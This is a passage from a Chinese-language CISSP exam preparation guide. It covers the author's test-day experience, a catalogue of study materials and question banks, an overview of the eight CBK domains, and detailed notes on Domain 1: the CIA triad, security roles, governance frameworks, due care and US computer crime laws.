⑨考试。内容熟悉的人,基本上 4 个小时以内就全部做完了,做的慢的都是模棱两可,知 识不牢的人。总之,考试分数和复习时间成正比。做一个复习计划,然后按部就搬的执行就行 了,过与不过全在于你做了没做,看你有多大的决心了。如果给一个标准的化,我认为,大部 分人需要不间断学 2 小时×120 天就差不多了,基础较差、拖拖拉拉的人可能要 1 年以上。 3.考试体验 ①时间。约考不用太早,基本上提前个半个月预约就行了,会有考位的,约早了肯定准备 不充分,总会纠结要不要延迟考试(50 美元/提前 24 小时改签),当然也可以早点约考,给 自己一个明确的期限,倒逼自己抓紧时间。我是考前休假一周,每天一次连续完整的 250 题模 拟考试,有把握通过了,才定的考试时间。模拟考中文题,一般 3 小时内完成;考英文题,一 般 4 小时内完成。实际考试是简体中文,但全靠看英文对照做题,4.5 小时完成;中间自由休 息几次;最后一个小时从头到尾把所有题检查了一遍,更正了 6 道题。考试时间绝大部分是上 午 9 点到 15 点这个时间段,我约的是中午 13 点到 19 点这个时间段。如果上午考,早上准备 工作仓促,路上拥堵奔波、人犯困,到了中午没饭吃,又饿、更困。如果下午考,有一上午时 间轻轻松松慢慢做准备,在楼下吃个午餐,我还把葵花宝典完整看了一遍,然后提前 10 分钟 到考场拍照、录掌纹。做完 150 道题,出来喝水撒尿;做完 250 题,又出来喝水撒尿,还跑楼 梯间抽了根烟;最后一个小时完整检查了一遍,心想肯定过了,交卷走人,当场打印了成绩单。 然后就约人吃火锅去了。 ②系统。考试系统和考驾照科目四的理论考试系统差不多,和计算机等级、职称英语等很 多机考的考试系统都差不多,界面看上去是很过时的、老旧的程序风格,字体也很粗糙,菜单 和功能相当的简单,右上角显示剩余的时间和完成的题数。做题是不能跳着选做任一题的,必 须从头到尾逐个的做,因为你除了点击答案,只能点“上一题、下一题、做标记”3 个按钮。 老老实实一个一个的做,挺枯燥的,头昏眼花,如果不是长期加班学习和多次模拟考的磨练, 根本坐不住 6 个小时。等全部做完 250 道题,才出现检查题目的功能菜单,可以比较灵活的选 择性的检查做题了。检查题目支持 3 种方式做题:一是全部从头到尾检查,二是只显示做了标 记的题,三是自己随时可以点击“检查”按钮按需选择要检查的题。 ③真题。考试的真题没有和做过的练习题是一样的(老外确实用心出题了,题库保密工作 还做得挺好)。真题仍然是大量的管理类、理论性、概念性、理解框架模型原理流程方法的题, 虽然内容都很明显在考试大纲范围内,但很多的具体知识点的描述并不是熟悉的中文教材、辅 导书里的原文;有的是在 CBK 或 NIST 800 系列特别出版物中有类似的描述;有的是在特定场 景里的实际情况。如果不好好看书,归纳出学习笔记,光靠题海战术也是过不了的,何况 CISSP 没有一套像样的中文习题集(“天龙八部”里汇编了 3410 道中文练习题,我都很不满意,还 —8— 是要靠做英文题来积累和巩固)。250 道题,总共约有 3 道排序题、3 道拖拉匹配题、3 道图 片点击选择题;其余全部是单选题。绝大部分是题干不长,就问 2 句话的简短问题,约有 200 道;还有 50 道是情景题,就是先描述一个场景,然后告诉你后面的 3 道题都是基于这个场景 的;而且,每间隔 20 道普通简短题,就会出一道情景题,这个规律和节奏还是很稳的(情景 题一定要小心,不然一偏差就会连错 3 道)。真题的中文翻译虽然是经过了审核校验的,但我 还是一头雾水,所以全程都是点开英文来做题。感觉考试题是由香港人翻译成中文的,比如 organization 考试中翻成“机构”,教材中翻成“组织”,erase 考试中翻成擦除,教材中翻 成清洗,还有好多差别不记得了。而且很多题前后有关联、暗示的关系,做到后面,会启发到 原来前面那个题应该是这样的。所以必须留时间检查题目。 二、宝典内容 葵花宝典的核心是要点笔记,是一系列的资料汇编和整理(培训班的内部资料是没有的), 包括 CISSP 必过三部曲: 1.九阴真经(知识之源):最新的、最权威、最全面的官方的学习资料汇编,大部分已经 是中文了。这是最基础的资料,英文中文都要看,反复看;先粗看后做题,做了题知道差距后 再精看;最后就可以不看了,内容都吸收理解到学习笔记里了。包括: ①书籍(好多) ▲考试大纲中、英文版/Exam Outline,Candidate Information Bulletin-2015(CIB)▲ CBK 官方指南_第 4 版中英文/Official (ISC)2 Guide to the CISSP CBK, 4th(CBK4)▲CISSP 官方学习指南_第 7 版/CISSP Official Study Guide, 7th英文版(OSG7)▲CISSP 认证考试指 南_第 6 版/CISSP All-In-One Exam Guide, 6 th中文版(AIO6)▲CISSP 认证考试指南_第 6 版 /CISSP All-In-One Exam Guide, 6 th英文版(AIO6)▲CISSP 学习指南一步登天/11th Hour CISSP Study Guide▲CISSP 预习指南黄金版/CISSP.Prep.Guide.Gold.Edition.Wiley▲CISSP 内训核 心辅导书/Study Guide, Third Edition-2016▲CISSP 必考要点笔记/CISSP Comprehensive Review Notes-2016▲中文资料▲备考经验介绍一大堆 ②课件(共 8 套) ▲中文培训讲义 8 个域 2016▲知名机构 CCCURE 的新版培训课件 8 个域 CBK4_2015▲美国 CISSP 特训班完整讲义(1500 页)▲官方中文培训讲义 10 个域 2013▲国内培训机构自制讲义 10 个域 2013▲AIO 中文培训课件 10 个域 2013▲AIO 英文培训课件 10 个域 2013▲Shon Harris (CISSP all in one 的作者)编写的 CISSP 讲义▲中文思维导图全集▲英文思维导图全集 ③视频(共 5 套) ▲10 个域中文培训辅导视频全集 2013▲8 个域英文培训辅导视频全集 2015▲美国 5 天特 训班完整培训视频全集 2015▲美国知名机构完整培训视频全集 2015 ④音频(共 3 套) ▲国内机构中文 5 天培训完整音频全集 2015▲美国 5 天特训班完整培训音频全集+讲义+ 习题 2015▲知名机构 CCCURE 的新版培训录音 8 个域 CBK4_2015 2.葵花宝典(去粗取精):全部知识点的梳理。按照考试大纲的结构,把各大权威资料的 知识点进行汇总,梳理成知识笔记,覆盖率达到 95%以上。学习过程就以该笔记为基础,边看 书、边自己理解,再整理完善这个笔记;精读完几本官方教材后,就可以甩开书了,以笔记为 —9— 参考,大量做题,用好 Word 的导航窗格、PDF 的导航标签以及内容搜索功能,可以快速找到 任一考题的知识点;做完各章节的题,基本上就建立知识体系了,就可以冲刺复习,做 N 套综 合的模拟考试题,把笔记里已经掌握的知识逐步删掉,只留下需要重点回顾记忆的知识,最后 就变成一个小册子了,考前好好过一遍就可以进考场了。为了方便学习,该宝典提供完整的 Word 版本,可以自行编辑整理。(友情提示:该宝典的内容仍有部分错误和偏差,复习过程 中自己去感受、修正吧,模棱两可没把握的知识点一定要自己去查验核实) 3.天龙八部(百炼成仙):2016 年以来的最新的、最权威、最全面的官方的习题集汇编 (精品题库 12000 道,备选题库好多好多套)。其中核心题集涵盖了 AIO、OSG、CBK 和官方出 版物的最有价值的习题共 7812 道(其中中文 3410 道,真题回忆 640 道);整理的 2016 年综 合模拟测试题共 10 套、3380 道;全部都有答案解析,不用来回翻看几本书、到处查找答案, 而且知识疑惑直接在葵花宝典里可以找到原文。当然,AIO7 附带的练习题光盘(1629 道选择 +90 道拖拉匹配)和 OSG7 提供的在线练习题(1400 道,拖拉、卡片各种形式)是非常好的学 习资源,也有必要做,做完必过。关于PDF题库的使用方法:用PDF编辑软件看书和习题(ACROBAT 什么的),用下划线、加色等方式可以注释笔记、选择答案和做过的题,比用纸质书的效率要 高。(此外,第二梯队备选题库,汇总了国外知名的英文模拟题和 2015 年以前的各大中文题 集等,如果精力旺盛看看也行)汇编前的原文题库有: ▲CISSP Official ISC2 Practice Tests 官方指定习题集及解析(2016 出版备考必看) ▲CISSP Practice Exams 最新官方习题集第四版(2016 出版备考必看) ▲Certpass.CISSP 最新模拟题集 V2016-01-04 ▲CISSP 正版题库 TestKing.v10.245Q 三、培训机构 2013 年起,考试已经是简体中文;OSG7 中文版已于 2017 年出版;知名培训机构也研究撰 写了大量中文资料和测试题;CISSP 的应试难度将有所下降,通过率和持证人数应该会大幅提 高。关于培训班的对比,本来详细列了很多对比,算了,不说了。关于通过率:瞎猜测 2016 年全国约考人数 398 人,参加考试约 304 人,第一次通过约 207 人。 四、主流教材 可以作为学习教材或辅导书的只有 OSG、AIO、CBK 这 3 本,其它的精品英文书籍也很多, 中文讲义也很多,可以做为补充资料、参考资料,CBK 的内容比较全、但看得难受,其它都不 全,但容易理解。葵花宝典的内容是全面而且高度归纳的,没有精读过教材直接看宝典很难快 速理解透,每一句话都有大量的信息,这是一个学习和思考的过程。建议: ①精读 OSG7_2 遍,搞定这一本就够了,边看边梳理葵花宝典笔记; ②通读 AIO6 中文版和 CBK4 中文版各 1 遍,边看边完善笔记,补充、巩固知识点; ③阅读 AIO7 英文版新增的内容,继续完善笔记; ③审阅 1 遍中文 PPT 讲义,继续完善笔记(如果报了班,就在培训时边听边完善笔记); ④学完做题,做完再学,学完再做。 作者采用的是学习方法是“一看二记三做题,查漏补缺模拟考”,先看中文书学的快,只 做英文题理解透,属于笨鸟型学习法,对于学霸型人才,肯定有更高效快速的学习方法。 —10— 关于葵花宝典的作用与方法,下面这个图可以做个参考: 教材按重要程度排序: 常用习题集: OSG7 在线练习题的注册方法: OSG7 书上的网址是错的,可以登陆 www.wiley.com/go/sybextestprep 注册,根据提示回 答问题就行了。也可以登陆 sybextestbanks.wiley.com, 或 http://sybextestbanks.wiley.com/course/index/id/102,选择 ISC2,即进入在线学 习,要先注册。点击 here 就可以进到注册页面了。 精读核心教材 (OSG、AIO、CBK) 反复做题巩固 (12000 题库) 审阅培训讲义 考前背记回顾 葵花宝典 (1486 知识点) 库) 去重取精搞全面 补充完善做归纳 查疑查难作参考 删减缩编成小册 —11— 注册使用在线练习题: 页面 1 地址如下,选择 CISSP Study Guide 7th这本书就行了,自动进入页面 2. http://customer.wiley.com/CGI-BIN/lansaweb?procfun+shopcart4+SH4FN19+funcparm s+PARMKEYG%28A0060%29:SYBEX 页面 2 地址如下,填写资料并回答一个关于书本内容的验证问题,就 OK 了。 http://customer.wiley.com/CGI-BIN/LANSAWEB?WEBEVENT+R0E37314884A6B8014146071+ PRD+ENG —12— 上面讲的乱七八糟的,其实只要搞对网址,内容都看得懂,都有提示。 另外就是 AIO7 附带的光盘习题 1692 道,是非常接近真题的。 五、知识简析 老外干什么事情,最喜欢的就是标准化思路,按科学的套路来。先搞清楚原理、机制,然 后制定出一套标准/框架/模型什么的;然后遵循这个标准/框架/模型,根据实际需求来拟制出 完善详细的策略/方案/计划;接着就按计划通过一系列的管理/治理/运营的方法手段来实施和 执行各项具体的工作;还要对完成的每项工作或者产品进行测试评估和认证认可才能接受或验 收;最后根据业务的完成效果再来修订标准/框架/模型。为什么要搞架标准/框架/模型呢?这 就是“标准化”观念,可以实现高效协同、量化管控、避免误解。 针对 CISSP 的应试,基本路子就是要通过学习充分理解其 CBK 的内容,建立起自己的信息 安全知识体系。在全部 8 个知识域中,各域的层级不同、方向不同、相互关联。通过学习建立 起自己知识体系的一个重要标志就是:看到任何一段内容或题目,能快速反应,知道它对应于 CBK 或考试大纲里的哪章?哪节?或者对应于教材里的哪个知识点,这就是有的放矢。当然, 知道那么多点知识点的位置出处还不够,还要理解它的内容(需要大量时间积累)。建议先初 步建立起知识框架,再仔细理解所有内容细节。 1.知识框架 属于管理范畴的知识域有 3 个,涵盖了信息安全各个专业领域,包括从高管管理到中层组 织到基层操作的 3 个层次:安全管理(即统筹治理)=>安全工程(即组织实施)=>安全运营(即 具体操作)。 —13— 属于技术范畴的知识域有 5 个,针对某类信息安全业务工作,包括:网络安全;资产安全; 访问安全;软件安全;安全测评。 具体看图: 总的来看,8 个域知识可概括为: 从三个层次来逐级抓好安全管理工作;(左) 从三个方面来合力完成资产安全任务;(右) 通过测试与评估来确保工作有效落实。(下) 当然,你也可以从攻与防、安全内核到外部的层级、数据的生命周期、系统的安全需求与 安全确认等角度来理解和构建各域知识。 2.知识概要 ①安全和风险管理(安全管理) 这是上层的,讲方法、讲原则、讲策略、讲宏观、讲管理。包括: *安全的目标:三元组; *实现的途径:安全治理,治理的方法和思路; *解决的方案:各种角色分工合作、联动协调; *实现的策略:策略、指南、操作 3 个层次; *工作的落实:应尽职责、应尽关注; *法规的依据:法律、法规、道德的约束; *管理的核心:把“事”管死,把“人”管活; *实现安全先要搞清楚风险:包括风险管理的基本要素、概念;还有流程(识别和评估); 也有方法(定量和定性);还有风险的处置(消减、转嫁、接受);还有风险管理的架构与威 胁建模。 *风险管的再好,也会出现问题,那么业务连续性的工作和灾难恢复的工作必须要做。 ②资产安全 目 的 技 术 管 理 安全管理(1) (战略) 安全工程(3) (战术) 安全运营(7) (操作) 资产安全(2) (可用/机密/完整) 网络安全(4) (资产的传输) 访问安全(5) (资产的调用) 软件安全(8) (资产的处理) 安全测评(6) (确保安全措施有效实施) —14— *什么是资产:要分类和分级,要搞清关系(资产所有者、监管者); *怎么保护敏感资产:就要搞清数据质量,正确的处置和重用数据; *保护资产的安全措施:保存、传输、使用都要有措施,最低的标准就是基线。 ③安全工程 作为一个安全总监,怎么管好一个公司的整体信息安全呢? *工程的生命周期:各阶段怎么做安全,安全原则啊; *做安全体系的各种模型:BLP、好多,就是做安全系统用的; *模型的检测、评估和选优:TCSEC、CC、ISO15408 好多,有分功能和水平; *通用硬件、软件的基本架构和安全功能、安全原理; *实现安全的基本手段:密码学,反正不考数学和算法,不难,对称、非对称,散列什么 的, 最重要的搞清密码学的应用,什么加密用在加解密、完整性、身份认证等什么场景,怎么用; *怎么搞好一个站点的安全:设计、规划、建设和运维一个站点,各种物理安全要懂。 ④通信与网络安全 *肯定先学网络架构和安全原则了:最重要的分层的思想,安全边界的运用,封装和解封 的各层的协议。 *然后要清楚基本网络组件的安全:各种硬件设备啦、终端啦、介质啦; *通信最重要的就是信道的安全了,最重要的方法就是 VPN 了,最重要的措施就是接入认 证了; *搞清楚各种针对网络的攻击和防御。 ⑤身份与访问管理 *先是背景理论:什么是访问控制; *访控的四个要素:好多要素,几个步骤; *实现 4 个要素的身份管理系统:SSO 什么的; *如何做好身份的标识和认证呢:单因素多因素什么的; *授权机制:不同的需求和出发点用不同的授权; *针对访问管理 IAM 的攻击和防御。 ⑥安全评估与测试 安全好没好,只有搞了评估才知道。 *策略:目标、人员和责任; *怎么做评估与测试,几个方面的工作:日志分析、代码测试、渗透测试,好多方法; *收集了好多评估和测试的结果数据,就感知到企业的威胁了,安全态势出来了,安全措 施必须要加强了; *审计完了,审计报告怎么写呢? ⑦安全运营 *老外认为运维的第一重要工作合法合规,是要调查取证,不是为了保障业务。 *配置管理,这就是具体的运营工作了; *运营的原则:可信路径、隐蔽通信什么的,好多; *又讲一遍怎么具体的保护资产; —15— *运营的流程:事件的管理最重要。 *出了问题怎么办: *怎么预防问题和事件: *变更要管理,灾难要恢复; *运营也包括对物理设施的运维,就是要保护好物理空间,都是物理的访问控制技术。 ⑧软件开发安全 *软件开发的基础和安全原则,SDL,有数据库啊、语言啊什么的。基础内容很多,但不是 直接出题的,题都在后面的内容里,放在具体场景里出; *软件开发可能存在很多问题:漏洞、恶意代码、病毒; *老美还很在意软件的评测和购买。 3.各域按出题比例排序(权重): 01_安全与风险管理_Security and Risk Management_16%,40 题; 07_安全运营_Security Operations_16%,40 题; 05_身份识别与访问控制_Identity and Access Management_13%,33 题; 04_通信与网络安全_Communication and Network Security_12%,30 题 03_安全工程_Security Enginering12%,30 题; 06_安全评估与测试_Security Assessment and Testing_11%,27 题; 02_资产安全_Asset Security_10%,25 题; 08_软件开发安全_Software Development Security_10%,25 题。 共 250 道题。 —16— 第一域 安全与风险管理(例如安全、风险、合规、法律、法规、业务连续性) Chapters 1,2,3,4,19 in OSG 7th Chapters 2,9 in AIO 6th A.理解并应用保密性、完整性和可用性的概念 1.安全的主要目的和目标就是 CIA 三要素/三元组 ①机密性(Confidentiality):机密性是指因为工作需要而访问敏感资源。机密性通常 通过最小权限原则来实现。安全架构师使用数据分类、访问控制和加密来确保资源的机密性。 ②完整性(Integrity ):完整性包括两个方面,一是确保信息被正确处理且不被未授权 的人修改,二是保护网络上传输的信息。完整性控制包括事务控制、数字签名等。 ③可用性(Availability):可用性确保资源可用、系统正常运行。可用性的防护措施多 种多样,诸如集群、发电机、备份和热站等。影响可用性的威胁包括自然的、人为的灾难,还 有拒绝服务攻击等。 这三个目标的对立面通常称为 DAD,即:破坏,篡改,和泄露。 这三个因素之间彼此影响。如:客体缺乏完整性,则机密性就无法被维护。又如:加密提 供机密性,但如果密钥丢失,就会产生可用性问题。 不同机构对三元组的重要性排序也不同,如军队首先看重机密性,而企业更重视可用性。 2.安全管理涉及的其它重要概念 在第五域还会复习这些概念。 ①身份识别/标识(identification)ID 用户向系统声称其真实身份的方式。身份标识是一个过程,主体先表明或提供自己的身份, 然后认证、授权,并且具备可问责性。计算机无法区分不同的人,只能通过 ID 账号来区别。 (用户名是识别工具) ②身份认证(authentication)鉴别 测试并认证用户的身份。认证或检测所表明的身份是合法的过程,就是身份认证。最常见 形式是使用密码。通过与合法身份(也就是用户账号)数据库中的一种或多种因素进行比较,身 份认证能够识别并承认主体的身份。身份认证和上面的身份标识总是作为一个过程中的两个步 骤被一起使用,不能分开。(密码、令牌都是认证工具) ③分配权限(authorization)授权 为用户分配并校验资源访问权限的过程。确保主体获得符合其身份级别的访问权限。(访 问控制列表 ACL 是授权工具) ④可问责性/可追溯性(accounting) 确认系统中个人行为和活动的能力。只有在主体的活动可问责时,你才能够保持安全性。 就是必须要检验主体的身份,并跟踪记录其活动。只通过密码认证是最不安全的,用户可能推 卸自己的过失操作行为。 ⑤不可否认性/抗抵赖性(undeniable) 能确认信息发送者即创建者的能力。不可否认性确保主体无法否认其已经发生的行为事 件。不可否认性是可问责性不可缺少的部分,如果嫌疑人不承认有关证据或指控,那么他的行 —17— 为就无法被问责。 ⑥AAA 服务(authentication、authorization、accounting) 就是指认证、授权和可问责,常用于身份认证系统,实际包括了五个方面的元素:识别、 认证、授权、审计和可问责性。如果一个安全机制缺少这五个元素中的任何一个,则这个机制 就是不完整的。 3.几种实现安全的解决机制(考题会问 XX 方法是利用和实现了什么安全机制?) 在操作系统里这些机制全都有应用,在第三域里要掌握,在第八域里也要掌握。 ①分层 简单地使用、连续的多重控制,也被称为深层防御。比如物理上设置多道安检大门,技术 上部署多套独立的不同原理的安防系统。“分层”和操作系统里的“环形”是差不多的。 ②抽象 抽象有 2 种方式,一是面向对象编程,被抽象的对象组件内的操作和数据都是不可见的(黑 箱);二是将实体抽象分级,提高管理效率,比如:客体按密级分类,主体按职能分配角色等。 ③数据隐藏 数据的物理存储空间是不能公开,也不能直接访问的,从而防止主体发现或访问数据。比 如阻止应用程序直接访问硬件,不让未授权的访问者访问数据库等。 ④加密 加密技术是安全控制非常重要,尤其在系统之间的传输数据时。 ⑤进程隔离 进程隔离要求操作系统为每个进程的指令和数据提供不同的内存空间,并强制实施分界, 以阻止某一进程读取或写入属于另外一个进程的数据。这样可以阻止未经授权的数据访问,也 可以保护进程的完整性。 4.两种数据分级方案 classification 以前书上叫“分类”,以后用“分级”个词更准确。 一般公开的、非涉密的数据不列入分类级别,也不适用于“分级”这个专业术语。 ①军政一般分三级 绝密(top secret)—秘密(secret)—机密(confidential),和非机密(unclassified)。 这是教材的字面翻译,其实与中国实际不同,在国内军政是这么分的: (核心)、绝密、机密、秘密、内部、公开。 ②商业一般分三级(不同公司的标准不一样,CISSP 考的是这种标准) 机密(Confidential)——隐私(Private)——敏感(Sensitive),以及公开(Pulbic)。 Confidential 是企业的,更高的是国家的 secret,最低的是个人的 Private。 B.应用安全治理原则 什么是安全治理 secure governance?其实就是信息安全管理。 安全治理是与支持、定义和指导组织安全工作相关的实践集合。安全治理与企业治理和 IT 治理密切相关,其目标都是相同的,都是维持业务流程,同时努力追求增长和弹性。 安全治理是一个框架:即管理层提目标,实施层操作,共同实现企业安全的一个有效机制。 —18— 主要内容有:组织的安全目标、任务,组织级的流程,安全角色和职责,安全战略等等。 (目标、责任、方法、检查)。第三方治理通常包括外部人员或审计人员,重点是外包服务的 安全目标、要求、法规和合同义务的合规性。 常用的安全治理的实践标准有:ITIL、ISO27001、COSO、COBIT 等。 B.1 使安全功能与组织战略、目标和使命相一致 (例如:商业案例、预算和资源) 没什么要考的内容。 B.2 组织级过程 (例如:并购、剥离、治理委员会) 没什么要考的内容. B.3 安全角色与职责 1.按照在安全环境中出现的逻辑顺序介绍六种安全角色: 在第二域 B 章节又把与处理数据相关的角色讲了一篇。 首先是信息安全官 CFO(Information Security Officer / Chief Security Officer), 不解释了,分管安全的最高领导,还是要服从 CEO 的。 ①高级管理者 Senior management 组织所有者(高层管理者),负责所有策略、负有最终责任。所有活动在被执行之前,都必 须得到高层管理者的认可和签字。 ②安全专家/信息系统安全专家(Information systems security professionals) 安全专家、信息安全官或计算机应急响应团队(CIRT),是受过培训和经验丰富的网络、系 统和安全工程师,他们对落实高层管理部门下达的安全任务。主要包括制定和实现安全策略。 安全专家不是决策制定者,他们只是实现者。 ③数据所有者(Data owners) 负责对信息进行分级的人,是层次较高的、最终负责数据保护的管理者。不过实际管理数 据的任务会委派给数据管理员来实施。数据所有者具有“应尽关注”的职责,要负责数据的分 级,如果数据所有者工作繁忙,可以将数据保护的日常维护工作委托给数据管理员完成。 ④数据管理员/保管员(Custodian) 负责实施安全策略和上层管理者下达的保护任务。包括:完成和测试数据备份、确认数据 的完整性、部署安全解决方案以及根据分类管理数据存储。 ⑤用户(user) 是具有安全系统访问权限的任何人。要求了解组织的安全策略,并遵守规定的操作过程, 在己定义的安全参数内进行操作,以便维护安全策略。 ⑥审计人员(Information systems auditor) 负责测试和认证安全策略是否被正确实现,以及相关的安全解决方案是否合适。审计人员 要撰写合规情况报告和有效性报告,高层管理者会审查这些报告。负责检查系统,判断系统是 否满足安全需求,以及安全控制是否有效 ⑦安全委员会(security committee) 成员来自:高级管理层代表、IT 管理者、业务部门和职能部门负责人、信息安全官等。 安全委员会的责任:决策并批准安全相关事务、策略、标准、指南和程序。 —19— ⑧安全管理员(Security Administrator) 负责实施、监视并执行安全规定和策略;各部门可以设立自己的安全管理员,负责执行本 部门安全管理事务;向安全委员会/信息安全官报告。 ⑨其它 帮助台(Help desk):接报并确认安全事件,向合适的人员转达以便响应。 审计委员会(Audit Committee):由董事会授权帮助检查和评估公司内部运行、内部系 统审计以及财务报告的透明度和精确度以帮助相关利益人持续对公司有信心。 灾难恢复/应急计划人员:从整体上负责组织的应急计划;与应用所有者、信息安全人员 等协同工作,取得其他应急计划支持。 应急响应团队 CIRT(Computer Incident Response Team):评价安全事件和造成的损害, 提供修补系统正确的响应,搜集证据。 搞清数据所有者、系统监管员、安全管理员的关系(必考)! B.4 控制框架 安全规划步骤中最重要的一步,也是第一步,就是考虑组织想要的安全解决方案的整体控 制框架或结构。而 C1SSP 考试的一个重点构架就是信息及相关技术控制目标(COBIT),但不 考它的详细内容,具体参考第九域中的法规。 1.3 种类型的控制: ①管理控制/软性控制(Administrative controls)。 ②技术控制/逻辑控制(Technical controls)。是软件或硬件,例如防火墙、ID、加密、 身份认证以及鉴别机制等。 ③物理控制(physical controls)。保护基础设施、人身安全以及资源安全的物理设施。 2.常用的企业管控与治理的实践框架: 1.安全方案开发:ISO/IEC 27000 信息安全管理 2.企业架构开发:①Zachman, TOGAF 企业架构框架;②TOGAF;③DoDAF;④MODAF 3.安全企业架构开发:SABSA 安全架构框架 4.公司治理:COSO 企业内控管理模型 5.安全控制开发:①COBIT IT 内部控制;②NIST 800-53 安全控制参考 6.流程管理:①CMMI 软件开发管理;②ITIL IT 服务管理;③Six Sigma 业务流程管理 7.其他相关:①PMBOK, Prince2 项目管理;②ISO9000 质量管理;③ISO 38500 IT 治理; ④ISO22301 业务连续性管理 这些不同的安全标准和框架不会考具体内容,但一定要清楚各自的目的和用途,会考某个 情景应该选择哪种控制框架!(详见第九域)也要理解安全规划(宏观的安全管理)必须具有 不断循环的生命周期,不断对其进行评估和改进。任何进程中的生命周期都可以用不同的方式 描述,通常使用下面的步骤: ①计划和组织——②实现——③运营和维护——④监控和评估 3.与系统架构相关的概念定义 ①架构 Architecture。就是一个客观存在的系统组织体系,包括系统的成员组成、相互 —20— 关系、设计原则等。 ②架构描述 Architectural description (AD)。采用标准的表达方式描述架构组成的一 系列文档。 ③受益主体 Stakeholder Individual。其利益与该系统密切相关的团队、机构等。 ④视图 View。从某些方面对整个系统的状况、态势进行展现。 ⑤视角 Viewpoint。根据不同需要选择从哪些关注面去构建和使用一个视图。 B.5 尽职关注/应尽关注(Due Care) ①应尽关注/适度关注/应有义务/适度谨慎 Due care:就是通过合理的关注保护组织利益, 例如:开发规范化的安全结构,包含安全策略、标准、基线、指导方针和程序等内容。 ②应尽调查/应尽职责/应有责任/适度勤勉 Due Diligence:就是维持好应尽关注的成果。 例如,将上述安全结构应用到组织的 IT 基础设施中。 企业要实现安全,就必须高度关注做好具体业务,还要高度重视做好审查分析。 讲了那么多,还是搞不清楚什么是关注,什么是调查,其实是先要做好了“调查”,才能 做好“关注”。再换一种通俗的说法: ①应尽关注 Due care(遵循规范/补漏洞):企业必须要承担这样的责任:尽心做好安全 管理、尽力阻止安全漏洞、尽量消减安全风险,以减少潜在的利益损失和负面影响。举个例子: 一家公司如果不花钱建立完善的防火措施,他就是没有履行“关注”的责任;当真的发生火灾 了,股东、员工和客户都可以依法起诉这家公司,因为它没有履责而造成了重大损失。 ②尽职调查 Due Diligence(限定时间/找漏洞):企业必须要开展这样的活动:全面了 解安全隐患、准确发现安全漏洞、客观评估安全风险,确保后续能真正有效地实施安全控制与 保护工作。也就是说:公司必须经常分析潜在风险、发现火灾威胁,从而能及时提出要实施的 防火措施。 B.6 尽职调查/应尽职责(Due Diligence) 写在上面了。 C.合规 法律、法规相关的内容在第七域 B.4 章节也有。 合规性是符合或遵守规则、策略、法规、标准或要求的行为。 C.1 法律法规的合规 法律到底考什么,考多深,说不清楚,国际性的通用法规标准肯定会考到。这对所有应试 者都是薄弱的章节,各种法案太多太乱了。不过再怎么样,也不会超出宝典里的内容,虽然很 难记住。实际参加完考试,并没有回忆出太多太具体的直接考法规的题,尤其美国本土的法律 原则上是不会考的,虽然各种练习题里有很多。 1.法律的类型 ①民事法(民事准则)Civil law(code):欧洲使用的,与美国的民事法律概念不同,下 级法院不用服从上级法院。Rule-based law, not precedence-based。 —21— ②普通法 Common law:英国制定的,美、加、澳都用,包括刑法、民法(民事侵权)、 行政(管理)法,使用法官和陪审团。Based on previous interpretations of laws。 ③习惯法 Customary law:中国、印度等采用混合法律的地区使用,主要处理个人行为。 Deals mainly with personal conduct and patterns of behavior。 ④宗教法律体系 Religious law:伊斯兰国家使用,并不创建法律,而是试图发现法律的 真理。Based on religious beliefs of the region。 ⑤法例法律体系:通常由民法和普通法组成,荷兰、加拿大、南非等国用。 CISSP 考的是普通法法律体系(Common law),包括 3 类法: ①民法(侵权法)Civil law:处理针对个人或公司遭受的破坏或者损失,民事诉讼导致 的结果是经济赔偿和或社区服务,而不是坐牢。如果有人在民事法庭状告另一人,陪审团会判 断是谁的责任,而不是宣判有罪或者无罪。 ②刑法 Criminal law:在一个人的行为违反政府法律时使用,是为了保护公众,判罚通 常是坐牢。 ③行政(管理)法 Administrative law:政府机构创建,用于监管公司或特定行业人员 的表现和行为,如食品安全标准、防火规范等。 关于符合性(GRC)的概念 符合性通常指确保行为符合既定的规则以及提供工具来验证符合性的行为,它包括法律以 及企业自身策略的符合性。 C.2 隐私要求的合规 详见 D.5 章节。 D.在全球化背景下理解与信息安全相关的法律和法规问题 D.1 计算机犯罪 主要讨论美国的法律,CISSP 会考以下每个法律的目的是什么,主要内容是什么?(虽然 原则上只考国际法规,但官方题库中涉及到了以下的所有法案)。 1.计算机诈骗和滥用法案(Computer Fraud and Abuse Act)(历史第一个) 国会在 1984 年制定了计算机诈骗和滥用法案(CFAA),主要针对下列罪行: ①非法访问联邦系统中的机密信息或财务信息。 ②非法访问联邦政府使用的计算机,以及联邦计算机进行欺诈活动 ③对联邦计算机系统造成恶意损失超过 5000 美元的行为。 ④非法修改计算机中的医疗记录。 ⑤非法买卖计算机密码。 该法案在 1986 年进行了修正,主要拓展了使用范围,涵盖了: ①由美国政府专门使用的所有计算机。 ②由金融机构专门使用的所有计算机。 ③被用于进行犯罪的所有计算机组合。 2.计算机安全法案(CSA 1987 年)Computer Security Act of 1987 国会还是不满 CFAA 的 1986 修正案,又制定了计算机安全法案(1987 年),为所有的联邦 —22— 机构设置了安全要求基准。CSA 的四个主要目的是: ①明确由美国国家标准技术研究所(NIST)负责开发联邦计算机系统标准和准则,由美国国 家安全局(NSA)提供技术性建议和援助。 ②颁布并施行上述的标准和准则。 ③要求所有使用涉密联邦计算机系统的操作人员,都要制定安全计划。 ④所有相关的 管理、使用和操作人员强制性参加定期培训。 ⑤它还指定了 NIST 负责公开系统的安防,NSA 负责机密级系统的安防。 这条法案的相关要求经过多年演进后,形成了联邦计算机安全策略的基础。 3. CFAA 修正案(1994 年) 1994 年,国会对上述法案又进行了大改。包括以下条款: ①生成任何类型恶意代码的行为是不合法的。 ②法案适用于所有被用于州间贸易的计算机。 ③允许关押罪犯,不管他们是否造成了实际的损坏。 ④计算机犯罪的受害者可以提起民事诉讼,其受到的损失可以获得减轻和补偿。 2015 年,奥巴马也准备做个修改,把计算机犯罪纳入 RICO 条款范围中,即反诈骗腐败组 织集团犯罪法(the Racketeer Influenced and Corrupt Organizations Act),不知道现在正 式颁布没有。 4.国家信息基础设施保护法案(1996 年)(National Information Infrastructure Protection Act of 1996) 1996 年,国会还是不满 CFAA,又通过了一系列修正案,再进一步扩展了其保护的范围, 包括以下新覆盖的领域: ①放宽了法案的范围,除了用于州间贸易的计算机,还包括用于国际贸易的计算机系统。 ②扩展了对国家基础设施(铁路、燃气、电力和通信线路等)的类似保护。 ③故意造成国家基础设施重大损坏的行为,要从重处理。 5.联邦判决指导方针(Federal Sentencing Guidelines) 1991 年发布的联邦判决指导方针主要提供计算机犯罪的处罚指导、解释说明等,它最重 要的三个条款是: ①提出审慎者规则(prudent man 